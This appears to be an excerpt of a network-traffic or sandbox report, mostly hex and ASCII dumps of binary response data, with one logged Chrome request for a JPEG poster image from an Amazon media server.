                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 36 06 27 db 9d 2e 75 c3 d1 79 4d d5 e5 cd 49 97 59 5e 87 17 bb d6 e7 78 5d f1 1e 08 b8 06 ec 2c 7f 32 e6 b1 3f 91 d7 11 b4 75 d2 f8 e2 d1 ac 5a cf 5e 9b 9c dc d1 d9 ea 7b 54 22 d6 96 32 ca 69 c2 96 bd b2 c4 ce 2c f6 05 16 71 5d 45 8b 60 7f 62 cb 58 93 99 7c f3 de 8a 16 62 55 4e 24 51 dc 90 52 d1 97 cb 1e 46 a3 31 3d 6b 42 df fd 14 2e 1f 08 b5 f6 5a 8d c4 fb 55 83 b2 08 cd a1 40 a2 66 41 2e 36 be 90 84 8c d6 a2 c1 eb d1 d0 84 97 cc 7e 07 ee 30 20 09 77 62 c8 82 66 5b 72 5a 4c 8b d1 d2 ad 12 ae 46 5b 02 71 5a 4b 4b 27 09 9d b4 cb ad f0 89 bb 82 53 7a 7c ee 57 b6 b9 59 c9 2b 75 43 fe 77 a7 2f f0 f2 f4 09 0a 11 12 ea ac 84 b6 87 4e f9 be 61 c3 cc 67 03 bf 9b 8f 05 5c ef 03 be e7 83 de ef 03 c1 42 10 70 e0 06 48 4a 3c ba 9d f0 bd 68 e7 04 84 15 f9 ac b8 1d f8
                                                                                                                                                                                          Data Ascii: 6'.uyMIY^x],2?uZ^{T"2i,q]E`bX|bUN$QRF1=kB.ZU@fA.6~0 wbf[rZLF[qZKK'Sz|WY+uCw/Nag\BpHJ<h
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 9d 0b 64 42 ca 35 2b 5d 6a 20 67 26 46 ec b6 fc 65 20 8f 94 7d df 84 70 b9 28 a0 ef 8b 43 a4 99 5a f4 b4 41 07 76 e8 76 5a 90 db 81 13 0f 77 7a cf f4 27 97 56 8d f8 ed d1 ae 7c e2 81 e0 c4 32 29 29 6e 0e 33 9d 3e 2f b7 c2 91 bd f7 40 e8 cd 97 37 1c 8f 8b cc 0c 1f 6e 4d 76 46 77 e1 1c 59 3a a5 a5 29 8b 6c 69 a9 02 99 ac 1d 4e b5 47 52 ce d1 a9 27 79 7b 2c 71 f2 e7 fe ba 2e b4 7f c7 1e 8d 73 e6 14 d5 0c 31 60 d2 d6 84 b6 bb d7 87 e8 cd cd ee e2 d9 2a 52 cd df 08 a6 69 19 ed 52 7f 4b 24 0e d6 4e ee de 1f b7 01 64 3d 99 69 54 bb 11 5d e5 ad db dd b8 56 89 bd 86 96 a5 a7 67 7e 92 5a 9b aa a1 f7 5d 50 31 c4 c6 6d 15 43 b8 39 4d 5a 40 45 71 82 5c 1f 8b f0 d1 bf 1d ba 35 cf 98 7a 20 81 e6 76 66 ac 06 19 4a 28 e5 36 84 58 06 06 18 e3 35 50 6c f0 83 21 16 75 ec 46
                                                                                                                                                                                          Data Ascii: dB5+]j g&Fe }p(CZAvvZwz'V|2))n3>/@7nMvFwY:)liNGR'y{,q.s1`*RiRK$Nd=iT]Vg~Z]P1mC9MZ@Eq\5z vfJ(6X5Pl!uF
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 8e 99 69 85 f5 6e f3 4c f3 fb 8a 9f 4e de 8b 36 8e 86 78 b1 31 d4 fe 67 43 23 85 d3 e3 fa d3 6a 72 8c f3 a8 9d e7 7c 8a 1a 06 95 bb b7 67 55 67 bd 14 33 3d 24 b8 4b 1b bd 6c b8 84 11 3d 38 ee cc d9 4f 50 f3 93 9b d3 d1 c2 71 5c c1 ed dd 57 4d bb cb 9a dd 7b cb 8d 35 34 d6 26 27 e0 de 19 6b d3 ec e0 ec 99 51 86 47 75 00 2b 2a a7 fa 12 a2 6c 5d d9 47 51 20 0d 86 59 0a 47 f7 2a c8 b6 a9 a2 15 46 6c 13 46 ef 5c ff 00 08 ad 2b bc ae a4 a0 9a 3b 83 1c 12 47 dd e1 aa 92 2f 72 d4 7b ca a8 0b 12 32 5a 80 e3 3c 8c a9 3e 1a a5 2b 36 31 bb 52 3f dc eb f6 a2 83 3a 27 e1 51 33 ce 6e 6f 49 0f f4 f3 9a 6f da 87 4a 79 44 4d 3d 1c 6c ab a3 db d8 16 a1 7c 4c cd 45 13 46 2c dc 47 c3 2f e4 cd ee 83 8e 9e 36 66 50 b2 77 53 bd e1 99 55 35 a5 91 94 74 b1 b8 01 1f 2b 02 a7 81 a3
                                                                                                                                                                                          Data Ascii: inLN6x1gC#jr|gUg3=$Kl=8OPq\WM{54&'kQGu+*l]GQ YG*FlF\+;G/r{2Z<>+61R?:'Q3noIoJyDM=l|LEF,G/6fPwSU5t+
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: af a7 91 e4 33 50 e9 a6 fe e2 6b 59 ad ab 50 6f 36 42 fa 5d f1 c2 96 19 29 a0 b1 8e 9f 1c ad 75 a6 69 e7 4b dd b5 9f 98 56 85 f8 ef c4 7c 32 d7 25 db db 44 4e 4f 77 e9 d3 be 78 90 41 cb cf 2d 49 9c 0d 55 4d 15 df f2 60 47 f8 93 f0 a4 fc 3a 94 f5 45 b3 b0 a3 f6 3c 74 cb 4e 87 72 9a 78 d4 b6 a7 1a 6a 75 a9 d3 46 e4 72 2d 2d da 68 de 22 ae 9b 7e 63 2e 8a 69 46 19 63 33 ac ac 2a c9 18 94 96 a6 8c 24 55 75 4d 4d 06 f3 05 74 92 8b cd 35 5d e8 63 17 7a 9d 69 8a 21 b0 3e 11 34 aa 9f 50 7c ec 3a ac 8d 24 a2 ed a1 7c 05 c4 7c 32 fe 41 f7 c5 d7 a7 bd a7 8d de b6 cf 3c ae aa c9 9e 8e 9d 93 ca 1c c4 2e a2 c2 68 24 8d ea 60 68 5d 99 b4 f3 02 8e 58 0a 56 8e 30 86 9d 1e a7 6a 8d b4 65 1b 45 5a 2d 2c c1 30 d2 ca aa a9 62 9c c8 d6 91 28 89 9b 97 44 cf 61 57 57 df 88 a2 53
                                                                                                                                                                                          Data Ascii: 3PkYPo6B])uiKV|2%DNOwxA-IUM`G:E<tNrxjuFr--h"~c.iFc3*$UuMMt5]czi!>4P|:$||2A<.h$`h]XV0jeEZ-,0b(DaWWS
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: fe 29 6f 24 62 16 58 c3 93 45 c2 8c 9d 5e e3 34 96 51 a1 07 ad b1 3b 8a 92 f1 23 c8 a4 e4 5c 9c 90 7a 5e 7c 5d 2d 3e 51 5f c7 42 73 4b 1a 47 e6 b9 0b 97 b8 7d 48 85 44 a0 2e 06 d4 87 c5 3b 97 60 81 63 08 a1 7a 0e 96 ab 96 15 cb 4a 61 f0 2d ae d6 39 73 56 bb e9 f7 62 af 3e 2e 96 7f 28 e9 7b 79 a8 d0 60 16 cd 0b 2f b8 b1 11 8a 66 f1 81 0a fd e4 fb 63 97 b5 0c 92 50 bd 79 dc ac 96 76 aa 8e b2 98 6e 92 54 d9 73 57 9f 15 1a b4 f9 45 16 c0 cd 5d 4d 96 26 91 bf dd 19 28 cf 5f fd 89 c6 f8 e9 9e 99 a9 c8 5b 47 c8 8a 38 23 33 16 bd 96 65 55 7e 10 a2 24 a8 b5 79 f1 74 b4 3f 98 55 c4 9a c4 d5 34 b9 35 f7 1f 01 53 02 82 d4 d3 84 18 16 8a cc 4b b6 6b 35 9a 07 26 b9 59 f5 b7 44 ae d7 82 69 a4 3d b5 4a e2 ed 5e 35 32 93 79 20 20 51 9d d8 60 f9 ab 4f 99 6a f1 b0 80 50 8d
                                                                                                                                                                                          Data Ascii: )o$bXE^4Q;#\z^|]->Q_BsKG}HD.;`czJa-9sVb>.({y`/fcPyvnTsWE]M&(_[G8#3eU~$yt?U45SKk5&YDi=J^52y Q`OjP
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 8f b7 4b 74 34 b2 29 76 f2 25 f9 b6 da c7 d4 c2 b7 48 09 ab 29 58 09 77 e4 be 0d 65 88 e0 98 cc 3f b1 b0 ab 93 2d ad 5c 98 ca 50 95 35 dc 10 9d fd 42 6c 99 f5 35 46 b8 1f 03 14 ff 00 27 6c af 8a 7a 0e 74 42 db 6d 0e 1d 71 ba bd 79 43 8b 66 74 a1 60 36 d7 89 49 e3 01 29 3e a5 8b 4a 73 42 8d 05 72 4f 36 76 05 d8 82 26 4d 5e 39 7d b8 bf 2f 6c af 8a 78 d0 31 ac 50 66 0e 39 b3 29 00 54 fc a2 63 a0 1f 8d 9c 02 ea 0a 8b b6 83 5b 5e 27 e3 2c ea 37 58 08 3d b2 00 e0 65 78 4e fa 31 fa 7a 6b 4b ae d8 bf 2f 6c 9f 8a 7a cc 3c 42 ec fa 13 03 09 2a af 60 54 57 cc df 8d 1b 00 de a2 28 a9 0d 85 ed 2e e5 cf 7c 96 fc 27 4c 41 6a 96 6b b1 79 26 c6 49 4e 7f 8e fc cc 5f 97 b6 57 c5 db 07 0b d4 7e 47 45 57 53 eb 47 1e 20 de 62 ae ce ce 5b ff 00 09 03 b1 ed 62 07 b2 b4 20 25 60
                                                                                                                                                                                          Data Ascii: Kt4)v%H)Xwe?-\P5Bl5F'lztBmqyCft`6I)>JsBrO6v&M^9}/lx1Pf9)Tc[^',7X=exN1zkK/lz<B*`TW(.|'LAjky&IN_W~GEWSG b[b %`
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: f3 da 4f f0 b8 0f cc 04 72 c5 1a 38 d7 eb 7a ec 1b 47 ab ac 89 4e 30 45 75 84 e3 e5 49 f0 da 81 bd 3f 5c 6a a4 0a f1 29 fe 16 cd d8 4c 1f d3 36 d9 d0 d8 1e fd c8 e3 72 78 e4 9f d3 f5 4e 8d f0 8c da 43 ee 46 87 0c db 67 43 60 7b f7 1f a6 91 ce 11 28 cf 4d 27 45 ad e8 c8 11 43 1a a6 a8 c5 4d db 84 a7 f8 3e aa 87 86 cc d7 6a e5 78 d0 db 3a 1b 03 df 4b fe 2b f5 f7 b8 f7 db 67 43 60 7b e8 dd af e5 a5 52 b9 1e f6 84 89 d4 6a 63 a0 44 99 71 a4 df 12 a4 00 ee 5e 7e 48 c8 d5 81 ec 97 15 83 5b 3e 7a 3b 6e d0 d8 1e f9 c8 51 1e 77 a8 e6 a3 9a 8e 61 0f f2 09 d6 8c d6 b4 5f ec 28 bf d8 4a f5 08 7f 96 95 c3 1d 23 3c 73 1a 6a 9d 3d a7 68 6c 0f 7d 2c 57 68 f4 cd b2 74 6e 77 af 70 34 07 89 8d ac e2 f3 ec 9d 24 f2 fa 0a 47 65 9f dc 5f f2 5b 50 00 b8 56 cc a2 7b 23 9d f5 f2
                                                                                                                                                                                          Data Ascii: Or8zGN0EuI?\j)L6rxNCFgC`{(M'ECM>jx:K+gC`{RjcDq^~H[>z;nQwa_(J#<sj=hl},Whtnwp4$Ge_[PV{#
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 05 cd 08 07 e2 f9 6b 4c 27 b2 d8 4d 8f fc ff 00 d8 26 d2 29 d1 37 c4 58 23 ce 8b b4 3a f1 4d 75 9d 98 85 d8 07 0f 88 ee 68 42 3f 0e a0 9b 22 68 99 e8 bc 2c ec 8d f1 e2 3e dc 17 68 75 1c 10 31 fd 2b b2 35 7c 4e f2 09 97 35 36 07 d9 9e ba 3f 8b 48 78 88 81 e4 98 4c aa 1b 19 6f 50 a7 80 95 4b 73 13 ba b5 5e 0f d6 ca ca bc 0d e1 a4 f3 44 c6 26 4d a4 32 84 6a b6 e3 ee 9c ec 98 da ba 78 54 1e 4b 2a f0 5b 12 0b 1a 0d 78 29 97 da 87 3b 1b 37 f9 74 56 ad 56 92 5b 11 ae 0a 17 6b 71 37 71 56 aa 25 b7 b2 d0 4d 24 b1 d7 d4 80 47 14 2e d5 47 70 37 af b5 ec df 2f 70 a8 c2 f4 cb fe 38 f7 bd 1f 01 83 44 d9 b7 77 aa 64 b6 b8 4c 45 e9 a4 36 90 d8 ad 6e 81 bd 34 b9 b1 36 85 ed 1d 0a fb 41 6d c0 01 6c e3 c5 30 92 1b 2e 22 a4 0d e4 99 e0 84 87 dc ed 58 a6 0f 11 df e1 31 a3 f8
                                                                                                                                                                                          Data Ascii: kL'M&)7X#:MuhB?"h,>hu1+5|N56?HxLoPKs^D&M2jxTK*[x);7tVV[kq7qV%M$G.Gp7/p8DwdLE6n46Aml0."X1


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          11192.168.2.1649723151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC660OUTGET /images/M/MV5BYjg3YjMyNGYtMWI5YS00ODgyLWIwOWUtODY2NzhmZGIyMzI1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31854
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: ae2faeb8-1fd1-4e16-a90b-229669720cde
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 16 Jun 2017 19:23:12 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 22:51:46 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2834176
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200039-IAD, cache-ewr-kewr1740054-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 00 01 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d3 84 1a 99 6c 10 f9 c5 0b bb d9 60 f7 de
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4l`
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 2f 86 3e d0 d6 b3 0e a5 ea da d7 4d 98 71 06 cb f1 42 55 43 54 a2 b7 a1 2f 1d 61 00 c9 e1 d7 29 74 35 51 3a e4 52 b4 e6 31 5c ee 47 19 cb 60 6b 96 b9 06 1a 2a 56 91 7c 89 9c 51 ac d6 1c cc 28 4e 68 0c c7 6e b1 ef 30 2b 4e d0 ba 55 d7 93 10 b7 04 8e 2b 15 7f ac 0d b8 e9 c9 be 6d d3 39 68 d8 58 54 2a 27 2d 39 f4 b5 2e 78 5b 9d 47 cd 93 89 38 8d 79 79 e7 75 d7 9f 8b 71 6e ec f2 ca f0 5e 54 80 5e 1e 82 fd 01 a1 af 9c ba 65 cb d2 a9 2b d9 90 37 2e 38 81 16 b1 22 ab 97 32 d3 89 ac 89 2d 4d 59 38 b7 1c f3 4a ad 7a b4 1c 16 ab ea 81 c9 63 84 bc 6f 4b 2b 1f 3b 13 b6 08 c9 76 0c b8 3b 04 e2 44 ad 8e 59 22 b6 89 a3 95 ad 6f b1 7d 6f 69 29 c7 b2 05 42 fd 0d 80 3e 5c 83 71 68 31 a8 cb f0 2d bd 9f e7 ae 90 b7 bc d0 c8 8c 06 c2 f2 71 81 2c 99 1e d4 7b 9f a3 49 b0 58 f9
                                                                                                                                                                                          Data Ascii: />MqBUCT/a)t5Q:R1\G`k*V|Q(Nhn0+NU+m9hXT*'-9.x[G8yyuqn^T^e+7.8"2-MY8JzcoK+;v;DY"o}oi)B>\qh1-q,{IX
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 6a 8e 61 7e aa 30 2a f0 1c 0d 2b 9b 24 0c 73 69 cf 30 89 a6 e7 04 e6 2a 30 b4 46 01 0f ad 85 34 a3 c6 f2 41 d4 a6 e5 e9 98 6b 78 10 ac 5c 48 cd 5e da b8 0d 56 17 21 78 81 d8 29 25 91 36 22 14 9b 9b 91 b9 90 ad 67 31 c3 91 6a 90 5c 39 78 51 a0 e3 ef a3 45 58 50 ca bb 2a bb b1 60 79 ef 36 6e 58 92 a0 27 19 e8 26 0a 14 25 38 a6 39 00 d5 84 01 05 e1 6d 12 04 bc c5 e4 f8 99 78 10 4f 2f 5a 84 25 ba 10 8f 5c 38 40 52 df 4f 25 8d 53 f7 a0 91 77 a3 b8 19 1c e1 52 99 59 9e 08 e5 5c 53 55 cb 67 72 d4 05 77 4d 1f ef 73 47 8f b9 89 52 77 02 21 f7 4d fa 2e e0 4e 1e e0 3c ce e9 15 ad ee 24 8e ee 1b 99 7d c3 35 e7 b8 44 39 f7 12 36 ce e6 38 29 ee a4 32 bb 9b 5c 67 71 2a 8d ee 98 ff c4 00 35 10 00 01 03 03 04 01 04 02 00 05 03 03 05 00 00 00 01 00 02 03 04 11 12 05 10 13
                                                                                                                                                                                          Data Ascii: ja~0*+$si0*0F4Akx\H^V!x)%6"g1j\9xQEXP*`y6nX'&%89mxO/Z%\8@RO%SwRY\SUgrwMsGRw!M.N<$}5D968)2\gq*5
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: a5 3d ad 27 aa 76 2d 52 9b 82 53 66 aa 2a d8 aa d8 d0 7d 30 1e 0b 24 1e 35 31 c3 7c 9c fc 8d f6 bd 96 89 5f 9f fe dd f6 df f6 13 fc 20 82 ba ba 2d 47 e2 09 53 c5 c4 e2 c3 a5 c4 24 6e 64 c5 05 6e 28 cd 03 2f 99 d6 29 e3 e9 95 1a d9 91 ae 6a 66 99 0f 4f 58 08 9a a6 a6 8e 5e dc ea 83 4e ef 8c 15 22 a1 56 d7 ba 91 d8 19 b5 09 1f d0 ba 0a 8a 1f 55 34 6d 58 e3 d2 d7 9f 77 c6 d4 d5 4b 13 9d 1d d4 59 c2 d0 55 67 f1 0b 1b d4 55 13 be 77 64 fb 2e c2 0e 09 84 34 82 34 fd 4d b5 36 63 ed b0 f2 14 88 2c 9a df 21 ed 57 08 d2 c4 a4 a5 8c 34 ad 42 98 47 67 36 92 a6 48 32 c2 7a 97 4b f7 89 f8 d2 cc 99 f0 65 d1 51 ea 13 d9 b1 b3 d5 1f ee 6d 71 75 b2 7d 2c 67 ec c3 14 37 0d d7 ad 2d 2c 52 2b ab a0 2f e2 18 4b 7b 5a 7b 89 82 3b eb ad fc ac 3b 09 5c 3c 1e fc ab ab a0 8e cd 01
                                                                                                                                                                                          Data Ascii: ='v-RSf*}0$51|_ -GS$ndn(/)jfOX^N"VU4mXwKYUgUwd.44M6c,!W4BGg6H2zKeQmqu},g7-,R+/K{Z{;;\<
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 93 49 56 cf 03 d7 35 7a aa c6 79 76 a5 27 45 d1 eb 58 a6 eb b1 b8 59 cd d4 e1 72 f5 d0 a6 39 af fa a3 e5 48 ac b2 92 e6 c1 d3 2c e5 52 1e 57 5d 37 ab b4 8d 88 44 27 04 e6 ef a2 4b 8b de dd 8a 77 5d ad 70 5d 91 4a 29 eb 49 1d 32 66 bd 54 e9 71 c9 db 65 8e 58 6c d7 be 4b 38 39 8d 96 d2 72 06 bb 20 d7 6c 36 c9 3a c7 cd 54 70 3d e0 23 4c d2 48 14 b4 71 70 80 60 a6 8e 0b f1 af da 90 a1 56 d6 e4 14 72 7c cc 6e 07 bc 76 7c 58 3c 85 8e e5 38 a7 14 e4 76 04 b4 dc 53 d6 3f 16 a8 25 98 f9 b8 75 dc 6b 35 7e 46 be 14 d7 77 71 16 a0 e1 f7 a7 ab 0f fa 72 35 e3 17 54 69 11 bf e8 ea 37 d3 3b f2 53 6a 2c 93 a3 80 7f 82 c2 dd 8e d5 14 4f 32 97 0a fa 59 18 d6 bd fa 5d c1 40 ed 53 2c 91 fd 3d 48 92 d7 92 17 c3 70 bd 69 c6 30 e9 9f 24 ee 6b db fe a1 6f 2f 78 71 41 15 74 e2 9c
                                                                                                                                                                                          Data Ascii: IV5zyv'EXYr9H,RW]7D'Kw]p]J)I2fTqeXlK89r l6:Tp=#LHqp`Vr|nv|X<8vS?%uk5~Fwqr5Ti7;Sj,O2Y]@S,=Hpi0$ko/xqAt
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: e7 9b 4b e2 31 15 ff 00 a7 1f 70 9d a1 b9 b2 3c 11 41 0c ed 95 d1 c3 a6 71 43 ea 26 a9 d3 30 8b 9e 1e 75 ce b9 91 96 fd 20 bf e9 62 52 54 89 05 9d 4b 26 5f 13 f4 45 f9 6d 24 a1 8a 3a 8b 2f 54 b9 97 22 e4 29 b2 15 99 58 2c 16 0b 42 93 f1 ba 33 a9 44 22 c2 9c 4f ff 00 c7 ad 6e 2b d3 00 d8 a7 95 cd 8e 9d da db 63 2d 67 2d 4e ae d2 c6 35 b7 6c 81 41 07 a0 86 a5 c7 58 6c 42 16 89 26 d5 61 7c 0d 81 9f c4 24 88 16 8f aa 88 cb d9 3d 66 90 d2 0c 94 d4 fc f5 14 b6 99 d6 f4 2e c3 70 a8 22 c9 d7 5a 9c f7 70 62 0f 50 d4 06 f9 8e a7 9b ca a8 ab 11 74 b9 9c 57 33 d0 a8 7a 6d 65 bc c5 56 c7 26 16 95 88 58 84 76 ba d3 ea 85 3c a1 ce 92 4e 69 1c f7 3e ba 9d f0 70 aa 5d 52 33 1f 1c f5 12 c0 2e d8 06 a3 05 44 78 54 54 49 18 1c 70 e9 12 e7 0e 2b 5a 97 39 04 6a 3d 42 19 e3 e3
                                                                                                                                                                                          Data Ascii: K1p<AqC&0u bRTK&_Em$:/T")X,B3D"On+c-g-N5lAXlB&a|$=f.p"ZpbPtW3zmeV&Xv<Ni>p]R3.DxTTIp+Z9j=B
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: a1 9c 92 51 8a 94 3a 6f 2c 98 d3 9c 5a 16 69 38 d3 a1 42 cf 12 1d 57 0b 1b 49 33 53 5e 28 5e 17 0b ed 17 fe 69 3f 6f dc 4f d4 65 49 33 f9 d9 3e ff 00 9d fe c7 37 ba f5 52 86 15 e6 a3 7f 8b 5f 93 35 65 09 96 5f 2a 74 39 a7 e2 8a 65 b1 cd b1 ca 8d 0c 59 5e 29 5a 97 aa 6d 4f 65 9e 1b 6a 4a 2d 33 f3 64 64 df 17 cd f0 d7 17 c6 a4 b1 d9 bc 90 bc 5f 0f 0c 5b b1 eb e0 58 da b1 4e bf 19 0f 8b 2c 4f e3 7c 68 55 70 e6 fe a3 92 a4 db 9f a9 8a 44 f3 e5 92 db 10 f8 6f 8b 2c bf 9d 12 9c 63 e7 f9 58 e5 37 15 38 c5 c5 c5 61 c8 e1 0a 76 36 58 df 28 b2 cb e3 62 c6 cb 33 28 42 4d 64 c3 e8 f2 49 a9 c6 6f 45 da cb 92 3d f1 26 33 b1 2e ae 4a 31 64 71 53 b2 50 57 6f 65 e1 7b 9d d1 65 08 6c d8 cb 82 39 63 52 c5 70 86 af d5 e4 7b 45 ac 6b 65 73 f7 18 e7 7c 68 68 25 c5 92 5f 7c 29
                                                                                                                                                                                          Data Ascii: Q:o,Zi8BWI3S^(^i?oOeI3>7R_5e_*t9eY^)ZmOejJ-3dd_[XN,O|hUpDo,cX78av6X(b3(BMdIoE=&3.J1dqSPWoe{el9cRp{Ekes|hh%_|)
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 4e c1 31 09 8f 09 17 8d f1 f4 b7 f0 71 80 9c 87 14 1d 39 e4 15 e9 89 c6 6c e0 c9 51 31 38 d8 42 18 40 a6 78 1d 3f aa d9 3f 2f 11 32 98 4a 26 14 e2 11 cc f2 47 ea 19 6b 43 d6 b5 4f cf 6b 13 f3 d8 13 3f 2a 98 e4 07 af 61 e8 75 ed 3f 3d aa e0 ea 0e 4e 49 55 31 71 05 37 2e 58 9b 42 d0 bc 2c 66 c6 5c 1c cf 1f 30 a7 d4 28 66 86 04 83 1b 4d 49 81 0c d5 a1 0e 05 9d cc d8 cf 21 9b c2 d3 69 73 68 9c dc be 61 3c 43 c7 30 82 4c d6 6a 6a 05 b0 20 17 08 e4 51 26 57 b3 0a 16 1c 0c 4c 61 c6 40 3d c1 94 7e f1 14 0a db 0f fb c5 d1 f1 88 14 72 26 9c 98 52 6c 20 6a 9b 2c 05 4c e2 e5 ac f2 0a 87 93 c5 11 da bb 9e c2 08 60 87 b8 87 f7 ff c4 00 3e 10 00 01 02 03 03 09 07 03 02 05 04 03 01 00 00 00 01 00 11 02 21 31 10 41 51 12 20 22 61 71 81 91 a1 b1 03 30 32 42 c1 d1 f0 40 52
                                                                                                                                                                                          Data Ascii: N1q9lQ18B@x??/2J&GkCOk?*au?=NIU1q7.XB,f\0(fMI!isha<C0Ljj Q&WLa@=~r&Rl j,L`>!1AQ "aq02B@R
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 00 d8 8c d6 87 6d 8d dd a6 1b c7 35 28 c5 42 19 27 95 91 6e 28 7a e7 ef cc f1 5e 31 cc ac 25 4f f8 83 44 7b ec cc be 43 d7 38 e4 9c 57 97 72 05 b7 d9 e5 75 18 73 e5 8a 4a 4d c1 41 7d 2a 10 72 19 a2 bd b0 38 ea 43 d5 4e 1e 96 df 9d 7a 9c 2f 5d 99 9e 7c f9 42 2a 54 80 19 f3 8b f5 7c 6b 02 bc 48 a2 eb 0e 8a 1c 4b 20 cc 36 d9 bf 5f ed 61 6d 9d d4 60 2d 23 c0 23 2c 28 33 43 01 fd 40 ff 00 2d 54 a1 15 28 30 1d c0 93 d5 1c a1 cf dd 4b 6d 92 3a 90 ca 0f 22 3d 96 05 16 93 f0 50 36 d1 24 1a 7d d4 e3 c2 e1 b5 47 23 a9 b3 e9 0f c7 dc 89 11 7d d8 ef d6 a1 c9 ca 79 0a 3d 0d 98 77 12 50 18 c6 20 4f d9 03 b0 85 a2 a6 80 76 3b 54 55 82 63 6d 9c 6b dc c9 c7 73 82 19 53 a2 c3 65 98 67 c3 94 0f 98 78 54 21 cd f5 6c c2 df a5 68 9c 42 19 70 fd f0 cf 8c 3e ca 7b 2d 81 fe 6c 4d
                                                                                                                                                                                          Data Ascii: m5(B'n(z^1%OD{C8WrusJMA}*r8CNz/]|B*T|kHK 6_am`-##,(3C@-T(0Km:"=P6$}G#}y=wP Ov;TUcmksSegxT!lhBp>{-lM
